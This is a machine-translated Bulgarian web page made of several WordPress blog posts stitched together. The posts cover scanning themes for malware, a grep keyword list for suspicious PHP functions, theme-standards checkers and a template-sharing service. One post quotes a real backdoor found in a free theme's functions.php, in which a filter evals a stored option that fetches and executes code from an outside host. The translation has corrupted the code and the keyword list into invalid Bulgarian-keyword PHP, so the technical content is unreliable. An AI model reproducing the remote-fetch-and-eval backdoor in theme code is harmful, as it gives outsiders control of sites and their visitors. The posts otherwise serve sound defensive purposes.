Проверете шаблона за злонамерен код. Как да промените шаблон на WordPress за себе си: проверка на оформлението на шаблона според правилата на SEO

22.08.2023

Прочетете също

Германска радиостанция по време на Втората световна война

Защо не мога да изтегля приложения и игри от Play Store на Android?

Как да създадете флаш устройство с няколко зареждания с помощта на програмата YUMI Windows 7 флаш устройство с много зареждане с помощни програми

Отстраняване на неизправности MTP USB грешка

Най-добрите безплатни емулатори на Android OS за вашия компютър

WordPress е най-популярният двигател за създаване на различни информационни уебсайтове и блогове. Сигурността на вашия уебсайт е повече от сигурността на вашите данни. Това е много по-важно, защото е и безопасността на всички потребители, които четат и се доверяват на вашия ресурс. Ето защо е толкова важно сайтът да не е заразен с вируси или друг зловреден код.

Ще разгледаме как да защитим WordPress от хакване в една от следващите статии, но сега искам да ви кажа как да проверите уебсайт на WordPress за вируси и зловреден код, за да сте сигурни, че всичко е безопасно.

Първата опция, за която се сещате е, че сте били хакнати от хакери и сте вградили техните задни врати в кода на сайта си, за да можете да изпращате спам, да поставяте линкове и други лоши неща. Това се случва понякога, но това е доста рядък случай, ако актуализирате софтуера навреме.

Има хиляди безплатни WordPress теми и различни плъгини и това вече може да е заплаха. Едно е, когато изтеглите шаблон от сайта на WordPress и съвсем друго, когато го намерите в левия сайт. Безскрупулните разработчици могат да вграждат различни злонамерени кодове в своите продукти. Рискът е още по-голям, ако изтеглите премиум шаблони безплатно, където хакерите, без да рискуват нищо, могат да добавят някаква дупка в сигурността, през която след това да проникнат и да направят каквото им трябва. Ето защо проверката на WordPress сайт за вируси е толкова важна.

Проверка на WordPress сайт за вируси

Първото нещо, към което трябва да се обърнете, когато проверявате сайт, не са вируси, това са плъгини за WordPress. Бързо и лесно можете да сканирате сайта си и да намерите подозрителни области от код, на които си струва да обърнете внимание, независимо дали са в темата, плъгина или самото ядро на Wodpress. Нека да разгледаме някои от най-популярните добавки:

1.TOC

Този много прост плъгин проверява всички теми, инсталирани на вашия сайт, за да види дали съдържат злонамерен код. Плъгинът открива скрити връзки, криптирани чрез вмъкване на код base64, и също така показва подробна информация за откритите проблеми. Най-често намерените части от код не са вируси, но потенциално могат да бъдат опасни, така че трябва да им обърнете внимание.

Отворете "Външен вид" -> "TAC"след това изчакайте, докато всички теми бъдат проверени.

2. VIP скенер

Много подобен на TOC скенер за теми, но показва по-подробна информация. Същите възможности за откриване на връзки, скрит код и други злонамерени вмъквания. Просто отворете елемента VIP Scanner в секцията с инструменти и анализирайте резултата.

Може да е достатъчно да изтриете ненужни файлове, например desktop.ini. Или трябва да разгледате по-подробно какво се случва във файловете, използващи base64.

3. Anti-Malware от GOTMLS.NET

Този плъгин ви позволява не само да сканирате темите и ядрото на сайта за вируси, но и да защитите сайта от груби пароли и различни XSS, SQLInj атаки. Търсенето се извършва въз основа на известни сигнатури и уязвимости. Някои уязвимости могат да бъдат коригирани на място. За да започнете да сканирате файлове, отворете "Анти-Malvare"в страничното меню и щракнете „Изпълни сканиране“:

Преди да можете да стартирате сканиране, трябва да актуализирате вашите бази данни със сигнатури.

4. Wordfence

Това е един от най-популярните плъгини за защита на WordPress и сканиране на зловреден софтуер. В допълнение към скенера, който може да намери повечето отметки в кода на WordPress, има постоянна защита срещу различни видове атаки и груба сила на паролата. По време на търсенето плъгинът намира възможни проблеми с различни плъгини и теми и съобщава за необходимостта от актуализиране на WordPress.

Отворете раздела "WPDefence"в страничното меню и след това отидете на раздела "Сканиране"и натиснете "Започни сканиране":

Сканирането може да отнеме известно време, но когато приключи, ще видите подробен отчет за откритите проблеми.

5. Антивирусна

Това е друг прост плъгин, който ще сканира вашия шаблон на уебсайт за злонамерен код. Недостатъкът е, че се сканира само текущият шаблон, но информацията се показва достатъчно подробно. Ще видите всички опасни функции, които са в темата и след това можете да анализирате в детайли дали представляват някаква опасност. Намерете предмет "Антивирус"в настройките и след това щракнете „Сканирайте шаблоните за теми сега“:

6. Проверка на целостта

Също така е препоръчително да проверите целостта на WordPress файловете, в случай че вирусът вече е писал някъде. Можете да използвате приставката за проверка на целостта за това. Той проверява всички основни файлове, плъгини и шаблонни файлове за промени. В края на сканирането ще видите информация за променените файлове.

Онлайн услуги

Има и няколко онлайн услуги, които ви позволяват да проверите WordPress сайт за вируси или да проверите само шаблона. Ето някои от тях:

themecheck.org- изтегляте архива на темата и можете да видите всички предупреждения за възможни злонамерени функции, които се използват в него. Можете не само да видите информация за вашата тема, но и за други теми, качени от други потребители, както и различни версии на темата. Каквото и да намерят плъгините, може да бъде намерено от този сайт. Проверката на вашата WordPress тема също е много важна.

virustotal.com- добре познат ресурс, където можете да проверите вашия уебсайт или шаблонен файл за вируси.

ReScan.pro- сканирането на WordPress сайт за вируси с помощта на тази услуга е безплатно; извършва се статичен и динамичен анализ за откриване на възможни пренасочвания; скенерът отваря страниците на сайта. Проверява сайта срещу различни черни списъци.

sitecheck.sucuri.net- проста услуга за сканиране на сайтове и теми за вируси. Има плъгин за WordPress. Открива опасни връзки и скриптове.

Ръчна проверка

Нищо не може да бъде по-добро от ръчната проверка. Linux има тази прекрасна помощна програма grep, която ви позволява да търсите произволни низове в папка с файлове. Остава да разберем какво ще търсим:

eval - тази функция ви позволява да изпълнявате произволен PHP код, не се използва от уважаващи себе си продукти; ако някой от плъгините или темата използва тази функция, има почти 100% вероятност да съдържа вирус;

base64_декодиране- функциите за криптиране могат да се използват заедно с eval за скриване на зловреден код, но могат да се използват и за мирни цели, така че бъдете внимателни;
sha1- друг метод за криптиране на зловреден код;
gzinflate- функция за компресиране, същите цели, заедно с eval, например gzinflate(base64_decode(code);
strrev- обръща линията назад не преди, като опция може да се използва за примитивно криптиране;
печат- извежда информация в браузъра, заедно с gzinflate или base64_decode е опасно;
file_put_contents- Самият WordPress или плъгините все още могат да създават файлове във файловата система, но ако темата прави това, трябва да внимавате и да проверите защо прави това, тъй като могат да бъдат инсталирани вируси;
file_get_contents- в повечето случаи се използва за мирни цели, но може да се използва за изтегляне на зловреден код или четене на информация от файлове;
къдрица- същата история;
fopen- отваря файл за писане, никога не се знае с каква цел;
система- функцията изпълнява команда на Linux система, ако самата тема, плъгин или wordpress прави това, най-вероятно там има вирус;
символна връзка- създава символни връзки в системата, може би вирусът се опитва да направи основната файлова система достъпна отвън;
копие- копира файл от едно място на друго;
getcwd- връща името на текущата работна директория;
cwd- променя текущата работна папка;
ini_get- получава информация за PHP настройките, често за мирни цели, но никога не се знае;
съобщаване на грешка (0)- забранява извеждането на всякакви съобщения за грешка;
window.top.location.href- javascript функция, използвана за пренасочвания към други страници;
хакнат- така че за всеки случай проверяваме, изведнъж самият хакер реши да ни каже.

Можете да замените всяка отделна дума в команда като тази:

grep -R "хакнат" /var/www/path/to/files/wordpress/wp-content/

Или използвайте прост скрипт, който ще търси всички думи наведнъж:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
копие(
оценка (
система(
символна връзка(
съобщаване на грешка (0)
печат
file_get_contents(
file_put_contents(
fopen(
хакнат"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Здравейте, скъпи читатели на сайта на блога. В днешно време има малко уеб администратори, които сами проектират уебсайта си (използвайки чист Html, свой собствен двигател или поне използвайки собствено създадени шаблони за CMS). Като цяло това е вярно, защото не всеки е в състояние да създаде нещо стойностно - това изисква талант на дизайнер. Най-често се оказва най-малкото „не много добро“, а понякога „просто ужасно“.

Ето защо шаблоните или темите за дизайн (в различните двигатели „кожите“ могат да бъдат наричани с различни термини) за популярните CMS станаха толкова широко разпространени. Особено много от тази доброта може да се намери в интернет за Joomla и WordPress, защото това е правилно, както в RuNet, така и в буржоазния интернет.

Всъщност вече има доста ресурси на руски език с каталози с готови шаблони. Е, в буржоазията няма как да ги преброим. Всичко изглежда толкова прекрасно - инсталирайте двигателя, намерете подходящ шаблон (не е тайна, че платените шаблони не са толкова трудни за намиране безплатно), изтеглете го и се насладете на професионалния дизайн на вашия нов уебсайт. Остава само да добавите ценно съдържание към него и ще можете да наблюдавате как популярността на вашия ресурс расте в Интернет.

Но не всичко е толкова просто и очевидно. Когато писах статия преди много време, получавах доста редовно от читатели по пощата препоръки да премахна тази или онази услуга от списъка, защото в публикуваните там в шаблоните се откриват скрити връзки или дори вируси. Оказва се, че е вярна поговорката – безплатно сирене има само в капана за мишки. Разработчиците на безплатни шаблони (или тези, които „нулеви“ платени) просто правят пари по този начин и, съдейки по обхвата, много от тях.

Скритите връзки към ресурси на трети страни (и често черни списъци от търсачките) и още повече вирусите могат да убият всички надежди за популяризиране на вашия ресурс (или сериозно да ги подкопаят и да ви развалят нервите). За това можете или. Как можете да се предпазите от всичко това при избора на шаблон?

Какво не е наред с безплатните шаблони за Joomla и WordPress?

От собствен опит мога да кажа, че е много трудно за един „аматьор“ да се конкурира с „професионалист“. В самото начало на тази публикация предоставих връзка към статия за вируси, които са заразили повечето от моите сайтове. Това се случи преди повече от две години и през това време повторих епичната борба за „чистота на кода“ повече от веднъж, но рецидивите все още се случват със завидна редовност на редица заразени ресурси (или от тях се изпраща спам, или се образува врата, тогава се случва нещо напълно неразбираемо за мен, което води до чудовищно голямо натоварване на хостинга).

В същото време използвам всички методи, достъпни за „нуб“, за да търся черупки и други задни вратички в кода на тези сайтове, но отново повтарям, че един аматьор просто не може да се конкурира с професионалист. Ето защо, ако мислите, че можете лесно да премахнете вирус, който се е промъкнал през шаблон, най-вероятно грешите. Това е много досаден, ужасно досаден въпрос (когато вирусната активност, въпреки всичките ви усилия, се появява отново и отново) и отнема много време и усилия.

Същото важи и за скрити връзки. Добре е, ако попаднете на опция за въвеждането им от минала епоха, когато можете просто да намерите мястото, където да ги вмъкнете и да се отървете от тях завинаги, като в крайна сметка получите чист и безплатен шаблон. В повечето случаи всичко е много по-сложно. За да намерите къде да вмъкнете скрити линкове, ще ви трябва софтуер (например приставката TAC), но той не е всемогъщ, защото бизнесът с разпространение на линкове чрез безплатни и платени (хакнати) шаблони за Joomla и WordPress носи много добри приходи, което насърчава хората, които го практикуват, да търсят нови решения, които правят тяхната „отметка“ по-малко забележима.

Всъщност днес може да бъде доста трудно дори бързо да проверите шаблон за генериране на „леви връзки“. Например, изтеглили сте шаблон, поставили сте го на сайта, добавили сте съдържание и сте решили да видите дали от него се появяват подозрителни външни връзки (които не сте поставили). Няма нито един от тях. Щастливи сте, забравяте за този проблем, заети сте да попълвате сайта и да го рекламирате, а след това изведнъж случайно откривате (сами или след сигнал от търсачките под формата на филтър или забрана), че все още има скрити връзки и те водят до такава „мръсотия“, която на вас самият никога не бихте си помислили да посочите.

Най-обидното в случая е, че да премахнете филтъра и да „избелите“ сайта в очите на търсачкитеМоже да отнеме много време (месеци и дори години в някои случаи). Но въпросът тук е, че разработчиците на такива „отметки“ са наясно, че вие знаете за тях и проверяват сайта след инсталиране на шаблона за „всякакви лоши ексцесии“. Поради това те забавят началото на генерирането на тези връзки за известно време, достатъчно според тях дори и най-подозрителният потребител да повярва в чистотата на шаблона, който е получил безплатно.

Освен това скритите връзки вече са кодирани по такъв начин, че да не се търсят чрез думите md5 или base64 (често се зареждат от външен източник). Просто набор от букви и специални символи, които не могат да бъдат намерени чрез търсене във всички шаблонни файлове. И може да има повече от сто от тези файлове. Освен това връзките не се появяват веднага. Тоест, всъщност е невъзможно уебмастърът (средният) да ги открие на етапа на създаване на уебсайт.

Е, за да избегна заразяване чрез шаблона, аз Предпочитам да плащам париза да не се налага да се справяте с куп проблеми по-късно. Друго нещо е, че можете да платите много пари или можете да платите не много. Аз лично избирам втория вариант, но първо ще обясня същността на първия.

Нещо, разбира се, може да се намери и в официалните хранилища на тези двигатели(прочетете за това и отидете на официалния уебсайт на разширенията за Joomla), но, първо, изборът там е значително ограничен, и второ, още много хиляди сайтове по света ще бъдат облечени в същите „дрехи“, което донякъде намалява уникалността на вашия проект както в очите на посетителите, така и в очите на търсачките.

В света обаче има много професионални компании, които разработват платени шаблони за Joomla и WordPress. Априори (), те не трябва да имат отметки, в противен случай незабавно ще загубят авторитета и доверието на клиентите. Въпреки това, цената за един шаблон може да бъде 50-100 долара, в зависимост от неговата функционалност и новост.

Освен това могат да възникнат някои проблеми с плащането (ще трябва или да поемете риск и да направите покупка с плащане директно от пластмасова карта). В резултат обаче ще получите умишлено „чист“ шаблон, което е добре. Вярно е, че техническата поддръжка, която идва с него, ще бъде от значение само ако знаете езика, на който се предоставя. В повечето случаи владеенето на руски език няма да ви помогне по този въпрос.

Вторият вариант ми харесва повече поради по-високата му рентабилност (съотношението на изразходваните пари към получените възможности), въпреки че по отношение на разработчиците не е напълно „изпрано“. Същността му е, че Joomla и WordPress разпространявани под GNU/GPL лиценз, т.е. лицензи за безплатен софтуер (такъв софтуер може да се използва, копира, модифицира и разпространява). Всъщност вече писах за това преди в статията за шаблоните на Joomla, спомената в самото начало.

Без да навлизаме в много подробности, въпросът е, че разширенията (шаблони, добавки и т.н.) за тези двигатели не могат да бъдат частна собственост на авторите. Да, можете да поискате плащане за тях, но вече няма да е възможно да наказвате или преследвате за неразрешено използване или разпространение на тези разширения. Въпреки това пазарът на платени разширения за Joomla и WordPress е огромен не са защитени от закона за авторското право. Напротив, лицензът GNU/GPL ви защитава на 100% от разработчика.

Между другото, много компании за разработка предоставят достъп до своите шаблони чрез абонамент. Тези. плащате определена сума и за определено време можете да изтеглите и продължите да използвате всички техни творения (шаблони или разширения) постоянно. Всъщност вторият начин за безопасно получаване на теми за WordPress, както и шаблони за Joomla, се основава на приблизително същия принцип.

Неотдавна мой приятел, когото споменах в редица статии, го „насочи с пръст“ (той от няколко години търси идеалния вариант за изграждане на онлайн магазин и по този път намира много неща, които ми се струват интересни и се използват активно в бъдеще) . Говорим за обединяване на премиум шаблони и разширения CmsHeaven.org .

Същността на набирането на средства е съвсем проста - купете продукт и го раздайте на всички, които са участвали в набирането на средства. CmsHeaven.org опрости схемата още повече - няма нужда да плащате за отделни шаблони или разширения, от които се нуждаете. Вие просто плащате за временен достъп до целия каталог, с който тази услуга разполага (няколко хиляди заглавия, разделени за по-лесно търсене по машини, автори и теми).

Всеки от представените продукти е честно закупен от разработчиците с парите на вложителите (има и безплатни шаблони, но отново те са представени от известни марки, от които се нуждаят за рекламни цели). И което е важно, организаторите непрекъснато актуализират каталога с нови екземпляри (в разгара на момента, както се казва), които ще трябва да чакат дълго време в публиката. Много хора ще харесат това.

Като цяло това е кооператив, в който можете да се присъедините и да се възползвате от всички предимства. Но с някои ограничения. Факт е, че организаторите са наясно, че без въвеждане на ограничения целият им каталог ще изтече в обществото след време. Следователно се провежда ограничение до 36 изтегляния на месец. Това е напълно достатъчно за обикновен уеб администратор и дори за компания за създаване на уебсайтове.

Това гарантира отсъствиев представените разширения и шаблони "отметки"(скрити връзки, вируси, троянски коне и доносници, които информират разработчика за сайта, използвайки техния шаблон). С оглед на това се купуват само продукти от известни марки с отворен код, където всичко това може да бъде проверено и, ако е необходимо, елиминирано.

Някои от разширенията са преведени на руски и ако възникнат проблеми с инсталацията или конфигурацията, което често е много необходимо (вероятно сте претърсвали интернет повече от веднъж в търсене на решение на проблем, възникнал изневиделица) . Между другото, това е, което отличава безплатните двигатели от платените, че няма потребителска поддръжка като такава.

И вие ще можете да изтегляте продуктите, които харесвате, с нормална скорост и без да гледате реклами на услуги за хостинг на файлове. Това е дреболия, защото за да получите заветното „сладко“, можете да преместите планини, а не само да се борите с услуга за хостване на файлове, но дреболиите са тези, които създават комфорт.

Като цяло много ми хареса идеята и нейната реализация, но трябва ли да използвам безплатни шаблони от репозиториите на Joomla и WordPress, да се присъединя ли в CmsHeaven.org или да купя шаблони директно от разработчиците? ще трябва да решиш сам. Само „умолявам ви, не яжте сурови домати през нощта“, тоест не изтегляйте безплатни продукти от всякакви „чудесни“ ресурси, защото можете да си създадете много проблеми. трябва ли ти

Късмет! Ще се видим скоро на страниците на сайта на блога

Може да се интересувате

Как да вмъкнете код за брояч на посещения в сайт, работещ с Joomla, като използвате модула за персонализиран HTML код или директно в шаблон
Как сами да създадете професионален уебсайт за визитки без познания по Html, CSS и PHP? Отговор: MotoCMS!
Как да получите адаптивен шаблон за бъдещ уебсайт, а с него и интуитивен и бърз CMS за зареждане
10 смъртоносни грешки при писане и публикуване на статии
Създаване на елемент от менюто в Joomla за влизане във форума и прехвърляне на потребителска регистрация от SMF към сайта
Настройване на JFusion за комбиниране на SMF форум и Joomla сайт
JFusion модули за показване на съобщения от форума в сайта, както и създаване на бутон в SMF за връщане към Joomla WebPoint PRO е адаптивна WordPress тема с широка функционалност и компетентна техническа оптимизация за търсачки
Share42 - скрипт за добавяне на бутони за социални мрежи и отметки към сайта (има опция за плаващ панел)
Инсталиране на SMF форум - Интегриране на Joomla 1.5 и Simple Machines Forum с помощта на компонента JFusion

Една от най-важните стъпки при създаването на блог е изборът на висококачествен шаблон. Има много сайтове, както платени, така и безплатни. Тук обаче трябва да внимавате, тъй като има голяма вероятност да получите вируси, злонамерени скриптове и скрити връзки заедно с файла.

Но дори ако шаблонът е чист от гледна точка на сигурност и сте напълно доволни от неговия дизайн, използваемост и функционалност, това не означава, че всичко е наред. Темата трябва да има валиден HTML и CSS код, както и да отговаря на всички стандарти на WordPress CMS.Дори платените теми и шаблоните по поръчка имат проблеми с последните.

Разработчиците на двигатели непрекъснато го развиват и авторите на шаблони не винаги са в крак с тях, като използват остарели функции при създаването им.

Днес ще ви покажа 2 начина за проверка на темите на WordPress за съответствие със стандартите. Тези инструменти се използват, когато се добавят към официалната директория https://wordpress.org/themes/

Услуга за проверка на WordPress теми и Joomla шаблони за съответствие със стандартите

ThemeCheck.org е безплатна услуга, която ви позволява да проверите безопасността и качеството на шаблоните за CMS WordPress и Joomla, преди да ги инсталирате на уебсайта си.

За да проверите тема, изтеглете нейния архив от вашия компютър, като щракнете върху бутона „Избор на файл“ на themecheck.org. Ако не искате резултатите от сканирането да бъдат запазени в услугата и достъпни за други потребители, проверете „ Забравете качените данни след резултатите“. Сега щракнете върху бутона „Изпращане“.

Например взех темата Интерфейс, който изтеглих от официалния сайт. 99 от 100 – 0 критични грешки и 1 предупреждение. Това е много добър резултат.

За сравнение моят шаблон за блог получи резултат 0 (14 грешки и 23 предупреждения). Мисля, че за мнозина резултатите няма да са много по-различни, особено ако темите вече са остарели. Всички бележки с обяснения, посочващи файловете и редовете, където са намерени, се намират на същата страница по-долу.

Честно казано, не разбрах много там; би било по-полезно за авторите и за мен е по-лесно да променя шаблона, отколкото да поправя всичко. Просто не знам кога ще реша да го направя.

На началната страница има голям избор от предварително тествани уеб теми на WordPress и Joomla с възможност за сортиране по време на добавяне или рейтинг. Когато щракнете върху тях, можете да видите подробна информация и връзки към уебсайта на автора и страницата за изтегляне.

Ако сте разработчик и вашата тема е 100% валидна, можете да информирате потребителите за това, като инсталирате специална значка с рейтинг върху нея.

Стойността на услугата ThemeCheck.org е, че всеки уеб администратор може да я използва, за да избере висококачествена тема, преди да я инсталира в блога.

Плъгин за проверка на тема

Можете да проверите вече инсталиран шаблон за съвместимост с най-новите стандарти на WordPress, като използвате приставката Theme Check. Линк за изтегляне на най-новата версия: https://wordpress.org/plugins/theme-check/

Функционалността на плъгина е подобна на услугата, която описах по-горе. Няма нужда да правите никакви настройки след стандартна инсталация и активиране. Процедура за проверка:

Отидете в административния панел на страницата на менюто „Външен вид“ – „Проверка на темата“.
Изберете желаната тема от падащия списък, ако имате няколко инсталирани.
Поставете отметка в квадратчето „Suppress INFO“, ако не искате да изпращате информация.
Щракнете върху бутона „Проверете“.

Резултатите ще бъдат показани на същата страница.

Както можете да видите, стандартната тема двадесет и десетСъщо така не е идеално, но напр. Двадесет и четиринадесетняма грешки.

След проверка, плъгинът може да бъде деактивиран или още по-добре премахнат напълно до следващия път.

Заключение.Преди да инсталирате нов шаблон на WordPress, проверете го не само за скрити връзки и злонамерен код с приставката TAC, но и с услугата ThemeCheck.org или приставката Theme Check за съответствие с най-новите стандарти на CMS.

P.S.Наскоро, докато разглеждах TopSape Reader, видях нов SEO блог zenpr.ru, който заема 1-во място сред блогърите по кликвания на месец. Като се има предвид, че е на малко повече от месец, резултатът е достоен за уважение. Дизайнът е в стил минимализъм, ако не кажем, че изобщо го няма, но авторът пише - ще го прочетете. Всичко до точката и без вода. Точно както в заглавието на блога – „нула допълнителни знаци“. Препоръчвам да го прочетете, ще намерите много полезна информация.

Здравейте приятели. Сигурни ли сте, че безплатният WordPress шаблон, който използвате за вашите уебсайтове и блогове, е наистина безопасен и не съдържа скрити заплахи или зловреден код? Сигурен ли си напълно в това? Абсолютно?)

Мислите, че сте пуснали шаблона през , премахнали сте скритите връзки от него и работата е свършена. Периодично сканирате файловете на сайта с антивирусна програма, разглеждате инструментите за уеб администратори на Yandex в раздела Сигурност и с облекчение виждате съобщението там: „ Не е открит злонамерен код на сайта«.

Това си помислих и аз. Не бих искал да те разстройвам, но...

Скрит опасен код в безплатни WordPress шаблони

Това е писмото, което получих миналата седмица по имейл от моята хостинг компания. Наскоро те въведоха редовна проверка на всички файлове на сайта, за да търсят злонамерено съдържание, и наистина откриха това съдържание при мен!

Всичко започна, когато един следобед отидох на уебсайта си и не можах да го стартирам - изскочи обидно съобщение за файлове с разширение php, които не бяха намерени. След като се напрегнах малко, отидох да проуча съдържанието на папката със сайта на хостинга и веднага открих проблем - моят шаблонен файл fuctions.php беше преименуван на functions.php.malware, което изглежда двусмислено намекваше - антивирусна беше работа тук или нещо подобно) След като отидох до пощата, намерих горния доклад от хостера.

Първото нещо, което направих, разбира се, беше да започна да проверя този файл, да изучавам съдържанието му, да го сканирам с всякакви антивируси, десетки онлайн услуги за проверка на вируси и т.н. — в крайна сметка нищо не беше намерено, всички единодушно твърдяха, че файлът е напълно безопасен. Разбира се, изразих съмненията си на хостера, като казах, че сте объркали нещо, но за всеки случай ги помолих да предоставят доклад за откриването на злонамерен код.

И ето какво ми отговориха

Отидох в Google информация за този код и се замислих сериозно...

Как да намерите част от зловреден код в шаблон

Както се оказва, това е наистина нетривиална техника, която позволява на заинтересованите страни да предават данни на вашия сайт и да променят съдържанието на страниците без ваше знание! Ако използвате безплатен шаблон, тогава Силно препоръчвам да проверите вашия functions.php за следния код:

add_filter('the_content', '_bloginfo', 10001);
функция _bloginfo($съдържание)(
глобална $пост;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
връща $co;
) иначе връща $съдържание;
}

Дори с много плитките ми познания по PHP е ясно, че се създава определен филтър, свързан с глобалната променлива post и content, които са отговорни за показването на съдържание само на страници с публикации в блогове (условието is_single). Вече е подозрително, нали? Е, сега нека да видим какво ще покаже този код на нашия уебсайт.

Интересната опция blogoption, поискана в базата данни, също изглежда много подозрителна. Влизаме в нашата база данни MySQL и намираме там таблица, наречена wp_options, ако не сте променили префиксите, тогава ще изглежда така по подразбиране. И в него намираме линията, която ни интересува, наречена blogoption

Каква красота! Виждаме следната опция

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Тези. От един сайт (и то руски) връщат съдържание, което може да съдържа всичко! Безброй връзки, злонамерени кодове, променен текст и др. Когато влезете в самия сайт, той ви дава грешка при достъп 403, което не е изненадващо. Разбира се, премахнах и тази опция от базата данни.

Според информация от потърпевши, точното съдържание на вашата статия обикновено се връща само с една модификация - вместо всяка точка „.“ отворена връзка беше скрита в текста! И между другото, тази опция се записва в базата данни, когато самият шаблон е инсталиран, и след това кодът, който прави това успешно се самоунищожава. И аз живях с такива боклуци две години и нито една антивирусна програма или услуга не ми идентифицира тази заплаха през цялото това време. Честно казано, не забелязах дали този трик някога е проработил при мен или моята приставка за сигурност е блокирала тази функция (или може би една от актуализациите на WordPress е затворила тази дупка), но все пак е неприятно.

Морал за безплатното сирене

Как ви харесва изтънчеността на нашите „преводачи“ на шаблони (или тези, които ги публикуват в своите каталози)? Това не е за вас да изрязвате връзки от долния колонтитул) Жалко, че не помня откъде изтеглих шаблона си, беше много отдавна, иначе определено щях да напиша няколко нежни. И ако по това време имах същия опит, който имам сега, определено нямаше да използвам безплатен шаблон или, в краен случай, нямаше да го изтегля от неизвестни източници!

По-лесно е да си купите някакъв официален премиум шаблон за 15-20 долара и да живеете спокойно, знаейки, че в него няма дупки или криптирани връзки и дори да има уязвимости, разработчиците определено ще пуснат актуализация, в която тези дупки ще бъдат затворен. ( Между другото, Артьом наскоро публикува статия, в която говори за премиум шаблони и дори дава промоционални кодове за брутални отстъпки за тези, които се интересуват)

Здравейте приятели на IdeaFox!

Не знам за вас, но аз имам проблеми със съня през нощта. Измъчват ме проблеми със сигурността на блога. Нямам сили вече :-)

Прочетох куп блогове по тази тема и тествах много добавки, които помагат за решаването на този проблем. И в коментарите започнаха да задават въпроси по темата за защитата на сайта, което ме накара да напиша тази бележка.

Само си представете, че поддържате блог, пишете статии, опитвате... И идват зли задници и ви разбиват сайта. Мисля, че ще има много мъка.

В крайна сметка всеки нормален блогър инвестира много време и усилия в развитието на своя уебсайт. И за мнозина блогването като цяло се превръща в мания... Тук и докато, ако ТОВА се случи :-)

Е, разбирате колко е важно това.

Хайде най-накрая да се заемем с работата :)

Преди няколко месеца вече написах бележка за хакване. Не пропускайте да го прочетете. Но оттогава мина доста време и взех допълнителни мерки за укрепване на цялостната защита.

В следващите бележки определено ще се спра подробно на този въпрос. (Също така си спомням и пиша за настройките на ISP)

3. Проверете сайта в други онлайн услуги

Такива услуги не липсват. Имам категорично мнение, че много от тях са напълно глупави и създадени единствено за показване на реклами.

Доктор Уеб

Компанията DR.Web направи добра услуга за проверка на сайтове онлайн. Лично той веднъж ми помогна да намеря инфекция в блога на приятел (имаше код на трета страна във файла .htaccess)

Проверката е много проста. Въведете своя URL адрес и изчакайте резултата от проверката.

antivirus-alarm.ru

Мощен скенер за уеб сайтове, който използва до 43 антивирусни бази данни от водещи антивирусни компании в света.

Тук също всичко е много просто. Въвеждаме URL адреса на нашия сайт и чакаме със затаен дъх резултатите от сканирането.

Чаках тези.

Всичко е чисто, можете да спите спокойно :-)

Всичко това е добре, разбира се, но също така трябва да инсталирате няколко плъгина, които изобщо няма да навредят на блоговете на WordPress.

4. Помолете вашия хост да провери сайта ви

Факт е, че домакините са още по-загрижени за проблемите на сигурността от вас и имат мощни мерки за сигурност. При това със специализирани средства за защита.

Това е новината, която имам за вас днес. След това ще ви разкажа за един много мощен плъгин, който може значително да защити вашия WordPress блог от хакване.

Вече 2 месеца работя с него и съм много доволен. Докато го разбрах, се баннах 3 пъти: –) Накратко, има какво да се каже.